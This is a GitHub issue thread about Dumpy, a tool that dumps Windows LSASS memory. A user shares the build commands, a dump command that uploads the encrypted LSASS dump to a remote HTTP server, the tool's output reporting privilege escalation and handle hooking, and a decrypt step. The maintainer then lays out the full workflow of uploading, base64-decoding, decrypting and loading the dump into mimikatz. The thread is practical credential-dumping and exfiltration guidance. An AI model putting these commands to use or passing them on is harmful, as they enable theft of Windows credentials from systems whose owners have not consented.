### ISSUE TITLE
Need help. Mimikatz stop working after upload file

### ISSUE THREAD

**Issue by useragent23253** [Kudaes/Dumpy#2]
Hello, i've got problem while loading it into mimikatz, because mimikatz stop working after upload decrypted lsass file. I'll explain.
Compilation passed good, I've setup secret key before building .exe  set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey" and then cargo build --release. Everything was fine. After I was dumping lsass on my Windows 10 (1909) host.
dumpy.exe dump -k yoursupersecretkey -u http://myipv4:8080 force
[+] SeDebugPrivilege successfully enabled.
[+] Handle to lsass leaked.
[+] Retrieved 65417 handles. Starting analysis...
  \ 10000 handles have been analyzed so far...
  \ 20000 handles have been analyzed so far...
  \ 30000 handles have been analyzed so far...
  \ 40000 handles have been analyzed so far...
  \ 50000 handles have been analyzed so far...
  \ 60000 handles have been analyzed so far...
[+] Valid handle to lssas found.
[+] NtOpenProcess hooked.
[!] Lsass dump created!
[+] File uploaded.
Next

c:\Users\Administrator\Documents>dumpy.exe decrypt -i WiS7B8b -o file1.txt -k yoursupersecretkey
[+] Successfully decrypted minidump file.

c:\Users\Administrator\Documents>ren file1.txt file1.dmp

and now i was trying to load it into mimikatz and get crashing program. It's just stop working. I think problem in decryption or something esle.
Can u help me with it? Any suggestions?

**Comment by Kudaes** [comment]
Hi @useragent23253,
As stated in the README ("In case the xored file has been uploaded using HTTP, it is required to perform a base64 decoding of the content before this decryption process."), if you use the http upload feature you need to base64 decode the dump file before decrypting it.

So the process would be:
1.- Upload dump file using http.
2.- Base64 decoding.
3.- Decrypt dump file.
4.- Load it into mimikatz.

Give it a try and let me know how it goes ;)

**Comment by useragent23253** [comment]
Thanks for your advice)). It's working.
